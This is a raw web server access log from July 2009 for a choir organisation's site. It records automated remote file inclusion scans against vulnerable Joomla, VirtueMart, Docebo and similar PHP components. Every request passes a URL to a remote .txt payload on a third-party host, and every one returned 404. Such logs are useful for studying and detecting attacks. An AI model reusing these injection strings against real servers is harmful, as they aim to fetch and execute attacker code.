67.208.139.72 - - [04/Jul/2009:09:38:51 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:41:50 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:41:50 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:41:50 -0700] "GET /logs/access_090603.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.115.58.73 - - [04/Jul/2009:09:42:00 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:42:12 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:42:12 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:42:12 -0700] "GET /logs/access_090603.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:42:14 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:42:14 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:42:17 -0700] "GET /logs/access_090629.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:42:19 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:42:19 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:42:19 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:42:26 -0700] "GET /logs/access_090626.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.136.16 - - [04/Jul/2009:09:42:28 -0700] "GET /logs/access_090213.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.136.16 - - [04/Jul/2009:09:42:28 -0700] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.136.16 - - [04/Jul/2009:09:42:29 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:42:32 -0700] "GET /logs/access_090626.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:42:49 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:43:07 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:43:07 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:43:07 -0700] "GET /logs/access_090517.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:43:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:43:13 -0700] "GET /logs/access_090517.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:43:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.243.71 - - [04/Jul/2009:09:43:35 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.243.71 - - [04/Jul/2009:09:43:35 -0700] "GET /logs/access_090626.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:44:51 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:44:51 -0700] "GET /logs/access.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:44:51 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
147.123.157.1 - - [04/Jul/2009:09:45:18 -0700] "GET /logs//com_media_library/toolbar_ext.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
147.123.157.1 - - [04/Jul/2009:09:45:18 -0700] "GET /com_media_library/toolbar_ext.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
147.123.157.1 - - [04/Jul/2009:09:45:18 -0700] "GET /logs/access.log//com_media_library/toolbar_ext.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:45:22 -0700] "GET /logs/access_090517.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:45:49 -0700] "GET /logs/access_090603.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:45:59 -0700] "GET /logs/access_090603.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:46:08 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:46:08 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:46:08 -0700] "GET /logs/access_090417.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:46:08 -0700] "GET /logs/access_090213.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:46:11 -0700] "GET /logs/access_090626.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:46:17 -0700] "GET /logs/access_090626.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:46:29 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:46:29 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:46:30 -0700] "GET /logs/access_090622.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:46:37 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.243.71 - - [04/Jul/2009:09:46:41 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:46:42 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:46:42 -0700] "GET /logs/access_090622.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:46:42 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:46:44 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:46:51 -0700] "GET /logs/access_090626.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:46:59 -0700] "GET /logs/access_090626.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:47:46 -0700] "GET /standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:47:46 -0700] "GET /logs/access_090603.log//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:47:46 -0700] "GET /logs//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.243.71 - - [04/Jul/2009:09:48:08 -0700] "GET /logs/access_090626.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.243.71 - - [04/Jul/2009:09:48:09 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:48:34 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:48:34 -0700] "GET /logs/access_090626.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:48:35 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:49:15 -0700] "GET /logs/access_090622.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:49:28 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:49:28 -0700] "GET /logs/access_090528.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:49:28 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:49:29 -0700] "GET /logs/access_090528.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:49:29 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:49:29 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:49:57 -0700] "GET /logs/access_090626.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:49:59 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:50:00 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:50:00 -0700] "GET /logs/access_090629.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:50:11 -0700] "GET /logs/access_090603.log%20%20//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:09:50:39 -0700] "GET /logs/access_090626.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:51:10 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:09:51:24 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:51:54 -0700] "GET /logs/access.log%20%20//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:09:54:09 -0700] "GET /logs/access_090626.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:54:41 -0700] "GET /logs//inventory///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:54:42 -0700] "GET /inventory///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:09:54:42 -0700] "GET /logs/access.log//inventory///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:09:54:47 -0700] "GET /logs//com_media_library/toolbar_ext.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:09:54:47 -0700] "GET /com_media_library/toolbar_ext.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:09:54:47 -0700] "GET /logs/access.log//com_media_library/toolbar_ext.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:56:03 -0700] "GET /logs/access_090629.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:56:10 -0700] "GET /logs/access_090629.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:56:13 -0700] "GET /logs/access_090629.log//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:56:16 -0700] "GET /logs/access_090626.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:09:56:25 -0700] "GET /logs/access_090626.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.221.130.17 - - [04/Jul/2009:09:57:00 -0700] "GET /logs/access.log//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:09:57:00 -0700] "GET /errors.php?error=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:09:57:02 -0700] "GET /logs/errors.php?error=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:09:57:03 -0700] "GET /logs/access_090626.log%20%20/errors.php?error=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:09:59:59 -0700] "GET /config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:00:01 -0700] "GET /logs/access_090414.log%20%20//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:00:01 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:00:01 -0700] "GET /config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:00:01 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:00:02 -0700] "GET /logs/access_090414.log//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:01:19 -0700] "GET /logs/access_090528.log%20%20//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:10:01:50 -0700] "GET /logs/access_090629.log/errors.php?error=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.137.160.12 - - [04/Jul/2009:10:02:11 -0700] "GET /logs/access_090626.log/errors.php?error=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:02:16 -0700] "GET /config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:02:16 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
